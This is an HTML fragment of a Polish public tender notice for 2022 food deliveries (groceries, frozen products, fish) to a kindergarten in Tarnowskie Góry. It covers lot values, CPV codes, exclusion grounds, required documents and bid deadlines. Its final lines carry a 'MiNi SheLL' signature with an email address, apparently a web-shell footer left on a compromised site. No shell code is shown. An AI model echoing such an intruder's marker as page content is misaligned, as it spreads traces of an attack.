class="mb-0">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W związku z brakiem możliwości jednoznacznego określenia wielkości przedmiotu zamówienia pod względem ilościowym, Zamawiający zastrzega sobie posłużenie się prawem opcji, o którym mowa w art. 441 ust. 1 ustawy z dnia 11 września 2019 roku – Prawo zamówień publicznych (tj.Dz.U. z 2021, poz. 1129). W takim przypadku całkowita, gwarantowana ilość przedmiotu zamówienia określona dla poszczególnych asortymentów, zamówiona i dostarczona w ramach opcji nie może być mniejsza niż 15 % ilości określonej dla poszczególnych asortymentów w załączniku nr 2 do umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium: Cena ofertowa (IP) – 100,00 pkt (waga kryterium wyrażona w<br/>punktach)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 5 (pakiet V): Różne produkty spożywcze:<br/>Przedmiotem zamówienia jest zakup i sukcesywne dostawy na podstawie odrębnych zleceń jednostkowych artykułów żywnościowych do Przedszkola nr 9 w Tarnowskich Górach w terminie od dnia zawarcia umowy (jednak nie wcześniej niż od dnia 03.01.2022 r.) do 31.12.2022 r.<br/>Wykaz produktów wraz z ich planowanymi ilościami znajduje się w załączniku nr 2a który stanowi plik Excel składający się z odpowiedniej ilości arkuszy, z których każdy stanowi oddzielny pakiet (część zamówienia) – arkusze oznaczone są numerami od nr 2.1 do nr 2.6 adekwatnie do danego pakietu (załączniki nr 2.1 do 2.6 do SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 45076,34 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03000000-1 - Produkty rolnictwa, hodowli, rybołówstwa, leśnictwa i podobne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03142500-3 - Jaja</p> <p class="mb-0">15331400-1 - Warzywa konserwowane i/lub puszkowane</p> <p class="mb-0">15332000-4 - Przetworzone owoce i orzechy</p> <p class="mb-0">15400000-2 - Oleje i tłuszcze zwierzęce lub roślinne</p> <p class="mb-0">15600000-4 - Produkty przemiału ziarna, skrobi i produktów skrobiowych</p> <p class="mb-0">15800000-6 - Różne produkty spożywcze</p> <p class="mb-0">15900000-7 - Napoje, tytoń i produkty podobne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W związku z brakiem możliwości jednoznacznego określenia wielkości przedmiotu zamówienia pod względem ilościowym, Zamawiający zastrzega sobie posłużenie się prawem opcji, o którym mowa w art. 441 ust. 1 ustawy z dnia 11 września 2019 roku – Prawo zamówień publicznych (tj.Dz.U. z 2021, poz. 1129). W takim przypadku całkowita, gwarantowana ilość przedmiotu zamówienia określona dla poszczególnych asortymentów, zamówiona i dostarczona w ramach opcji nie może być mniejsza niż 15 % ilości określonej dla poszczególnych asortymentów w załączniku nr 2 do umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium: Cena ofertowa (IP) – 100,00 pkt (waga kryterium wyrażona w<br/>punktach)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 6 (pakiet VI): Produkty głęboko mrożone i ryby:<br/>Przedmiotem zamówienia jest zakup i sukcesywne dostawy na podstawie odrębnych zleceń jednostkowych artykułów żywnościowych do Przedszkola nr 9 w Tarnowskich Górach w terminie od dnia zawarcia umowy (jednak nie wcześniej niż od dnia 03.01.2022 r.) do 31.12.2022 r.<br/>Wykaz produktów wraz z ich planowanymi ilościami znajduje się w załączniku nr 2a który stanowi plik Excel składający się z odpowiedniej ilości arkuszy, z których każdy stanowi oddzielny pakiet (część zamówienia) – arkusze oznaczone są numerami od nr 2.1 do nr 2.6 adekwatnie do danego pakietu (załączniki nr 2.1 do 2.6 do SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 17032,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03000000-1 - Produkty rolnictwa, hodowli, rybołówstwa, leśnictwa i podobne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15200000-0 - Ryby przetworzone i konserwowane</p> <p class="mb-0">15220000-6 - Ryby mrożone, filety rybne i pozostałe mięso ryb</p> <p class="mb-0">15896000-5 - Produkty głęboko mrożone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W związku z brakiem możliwości jednoznacznego określenia wielkości przedmiotu zamówienia pod względem ilościowym, Zamawiający zastrzega sobie posłużenie się prawem opcji, o którym mowa w art. 441 ust. 1 ustawy z dnia 11 września 2019 roku – Prawo zamówień publicznych (tj.Dz.U. z 2021, poz. 1129). W takim przypadku całkowita, gwarantowana ilość przedmiotu zamówienia określona dla poszczególnych asortymentów, zamówiona i dostarczona w ramach opcji nie może być mniejsza niż 15 % ilości określonej dla poszczególnych asortymentów w załączniku nr 2 do umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium: Cena ofertowa (IP) – 100,00 pkt (waga kryterium wyrażona w<br/>punktach)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. W przypadku wspólnego<br/>ubiegania się o zamówienie przez Wykonawców, oświadczenie o którym mowa powyżej składa każdy z Wykonawców ubiegających się o zamówienie – Załącznik nr 4 do SWZ;<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>UWAGA: W przypadku wskazania przez Wykonawcę dostępności oświadczeń lub dokumentów, w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Pełnomocnik Zamawiającego pobiera samodzielnie z tych baz danych wskazane przez Wykonawcę oświadczenia lub dokumenty – wskazanie należy podać w pkt. 10 Formularza oferty (zał.nr 1 do SWZ).<br/>3) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez pełnomocnika zamawiającego (Załącznik nr 5 do SWZ), o których mowa w:<br/>a) art. 108 ust. 1 pkt 3 ustawy,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy,<br/>e) art. 109 ust. 1 pkt 7 ustawy.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokumenty i oświadczenia określone w pkt 4.1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie, w zakresie jakim go dotyczą.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> I. Wraz z ofertą należy złożyć:<br/>1) Formularz oferty - załącznik nr 1 do SWZ,<br/>2) Kalkulację cenową (odpowiednio dla wybranej części - pakietu) tj. załączniki nr 2.1 - 2.6 do SWZ. Kalkulację cenową przekazuje się w postaci elektronicznej, i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>3) Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym w rozdziale XIX SWZ – zgodnie z Załącznikiem nr 3 do SWZ.<br/>4) Pełnomocnictwo/wa ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego.<br/>5) Oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp („(…) z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.”) – o ile dotyczy (odnosi się do Wykonawców wspólnie ubiegających się o udzielenie zamówienia). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/><br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/><br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z ofertą stosowne pełnomocnictwo – zgodnie z ust. 3.4. rozdz. XVI SWZ – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/><br/>Uwaga!<br/>Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/><br/>4.	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/><br/>5.	W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art. 125 ustawy (ust. 3.1. rozdziału XVI SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. Powyższe oznacza, iż:<br/><br/>5.1.	Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/><br/>5.2.	Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnianie; dopuszcza się oświadczenie złożone łącznie, tj. podpisane przez wszystkie podmioty wspólnie składające ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów.<br/><br/>6.	Dopuszcza się, aby wadium zostało wniesione przez pełnomocnika (lidera) lub jednego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z zastrzeżeniem ust. 6.1. niniejszego rozdziału SWZ.<br/><br/>6.1.	W przypadku wniesienia wadium w postaci niepieniężnej, treść dokumentu wadialnego musi zapewniać możliwość zaspokojenia interesów Zamawiającego co oznacza, że uzyskanie zagwarantowanej zapłaty wadium musi obejmować wszystkie wskazane w ustawie przesłanki zatrzymania wadium, o których mowa w art. 98 ust. 6 ustawy, tj. działania lub zaniechania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7.	W przypadku, o którym mowa w art. 117 ust. 2 lub 3 ustawy Pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są dołączyć do oferty oświadczenie, o którym mowa w art. 117 ust. 4 ustawy („(…) z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.”).<br/><br/>8.	Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje zmiany umowy określone w § 8 wzoru umowy stanowiącym załącznik nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy miniPortal https://miniportal.uzp.gov.pl/ (postępowanie oznaczone znakiem sprawy oraz tytułem niniejszego postępowania)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-13 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-11</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <p class="mb-0">Część 6 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin składania i otwarcia ofert zostaje przesunięty ze względu na problemy techniczne platformy ePUAP Zamawiającego.

Creat By MiNi SheLL
Email: jattceo@gmail.com